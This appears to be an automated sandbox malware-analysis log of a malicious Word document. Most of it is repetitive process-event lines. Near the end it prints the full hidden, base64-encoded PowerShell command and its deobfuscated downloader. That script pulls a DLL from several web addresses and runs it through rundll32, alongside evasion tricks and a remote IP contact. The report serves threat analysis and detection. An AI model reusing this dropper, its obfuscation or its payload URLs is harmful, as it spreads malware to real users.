Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000005.00000002.2086476389.0000000000344000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h]

7_2_10001D4D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory protected: page execute read | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 84.232.229.24 80

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded SeT-iTEm ("vARi"+"abLe:0i"+"9f"+"Zb") ( [TYpE]("{1}{2}{4}{5}{0}{3}{6}" -F 'TO','SYSTe','M.Io.di','R','re','C','Y') ) ; $ywM9n =[tYPE]("{5}{0}{3}{2}{4}{1}" -F 'nEt.seRV','eR','InT','iCEPo','maNAG','SYstEM.') ; $S4k6trj=$N69G + [char](33) + $O2_P;$G14Q=('U'+('3'+'6N')); $0I9fzb::"CReat`EDirE`cTORY"($HOME + ((('2ObL'+'i'+'q')+'8l'+'5'+'8'+('2'+'ObEg')+('o'+'k7ei')+('2O'+'b')) -CRepLAcE ([ChAR]50+[ChAR]79+[ChAR]98),[ChAR]92));$O2_Y=(('T'+'35')+'D'); ( gCi VARIAblE:ywm9N ).Value::"SEcur`iTYp`Rot`oCol" = (('Tl'+'s')+'12');$S77N=('A'+('81'+'W'));$Gqh0j_b = ('D'+('6'+'4O'));$W86O=(('C'+'47')+'F');$Mtn05vr=$HOME+(('{0}'+'Liq8l58{0}'+('Eg'+'o')+'k7'+'ei{0}') -f [Char]92)+$Gqh0j_b+'.d' + 'll';$K69W=(('H8'+'9')+'Y');$Tk1qwt9='h' + 'tt' + 'p';$Oylx1dc=(('x ['+' s'+'h')+' b'+':'+'/'+('/n'+'ady')+'s'+('a'+'.c')+'om'+('/'+'w'+'p'+'-conte')+'nt'+'/A'+('lm'+'et')+'/'+'!'+('x'+' [')+(' sh b'+'://b'+'oom'+'ark')+('ete'+'r.'+'co')+('m'+'/w')+('p-c'+'ont'+'e')+'nt'+('/'+'6/')+'!'+('x '+'[ sh')+(' '+'b:')+'//'+('croo'+'k'+'s-taylor')+('.c'+'o')+'m'+'/'+('16'+'76')+'47'+('0973'+'/1/!'+'x')+' ['+' s'+'h'+' '+'b:'+'/'+('/w'+'h'+'ite')+'t'+'he'+('m'+'e.')+'xy'+('z/'+'wp-con'+'t')+('ent/'+'q')+'8H'+('/!x'+' ['+' sh')+(' b'+':')+('//r'+'ex')+('.ta'+'s'+'mir')+('a'+'group.')+('com'+'/')+('w'+'p-')+'in'+('c'+'lud'+'es/un6G/'+'!x ')+('[ '+'sh b:'+'//')+'r'+'ab'+('i'+'ei.')+('fu'+'n/')+'ei'+'dl'+('-recons'+'i'+'d')+'e'+('ra'+'ti')+('on-bs'+'3l'+'u/')+('fe'+'o')+'Oi'+('AO/'+'!')+('x'+' [ s')
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded SeT-iTEm ("vARi"+"abLe:0i"+"9f"+"Zb") ( [TYpE]("{1}{2}{4}{5}{0}{3}{6}" -F 'TO','SYSTe','M.Io.di','R','re','C','Y') ) ; $ywM9n =[tYPE]("{5}{0}{3}{2}{4}{1}" -F 'nEt.seRV','eR','InT','iCEPo','maNAG','SYstEM.') ; $S4k6trj=$N69G + [char](33) + $O2_P;$G14Q=('U'+('3'+'6N')); $0I9fzb::"CReat`EDirE`cTORY"($HOME + ((('2ObL'+'i'+'q')+'8l'+'5'+'8'+('2'+'ObEg')+('o'+'k7ei')+('2O'+'b')) -CRepLAcE ([ChAR]50+[ChAR]79+[ChAR]98),[ChAR]92));$O2_Y=(('T'+'35')+'D'); ( gCi VARIAblE:ywm9N ).Value::"SEcur`iTYp`Rot`oCol" = (('Tl'+'s')+'12');$S77N=('A'+('81'+'W'));$Gqh0j_b = ('D'+('6'+'4O'));$W86O=(('C'+'47')+'F');$Mtn05vr=$HOME+(('{0}'+'Liq8l58{0}'+('Eg'+'o')+'k7'+'ei{0}') -f [Char]92)+$Gqh0j_b+'.d' + 'll';$K69W=(('H8'+'9')+'Y');$Tk1qwt9='h' + 'tt' + 'p';$Oylx1dc=(('x ['+' s'+'h')+' b'+':'+'/'+('/n'+'ady')+'s'+('a'+'.c')+'om'+('/'+'w'+'p'+'-conte')+'nt'+'/A'+('lm'+'et')+'/'+'!'+('x'+' [')+(' sh b'+'://b'+'oom'+'ark')+('ete'+'r.'+'co')+('m'+'/w')+('p-c'+'ont'+'e')+'nt'+('/'+'6/')+'!'+('x '+'[ sh')+(' '+'b:')+'//'+('croo'+'k'+'s-taylor')+('.c'+'o')+'m'+'/'+('16'+'76')+'47'+('0973'+'/1/!'+'x')+' ['+' s'+'h'+' '+'b:'+'/'+('/w'+'h'+'ite')+'t'+'he'+('m'+'e.')+'xy'+('z/'+'wp-con'+'t')+('ent/'+'q')+'8H'+('/!x'+' ['+' sh')+(' b'+':')+('//r'+'ex')+('.ta'+'s'+'mir')+('a'+'group.')+('com'+'/')+('w'+'p-')+'in'+('c'+'lud'+'es/un6G/'+'!x ')+('[ '+'sh b:'+'//')+'r'+'ab'+('i'+'ei.')+('fu'+'n/')+'ei'+'dl'+('-recons'+'i'+'d')+'e'+('ra'+'ti')+('on-bs'+'3l'+'u/')+('fe'+'o')+'Oi'+('AO/'+'!')+('x'+' [ s')			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 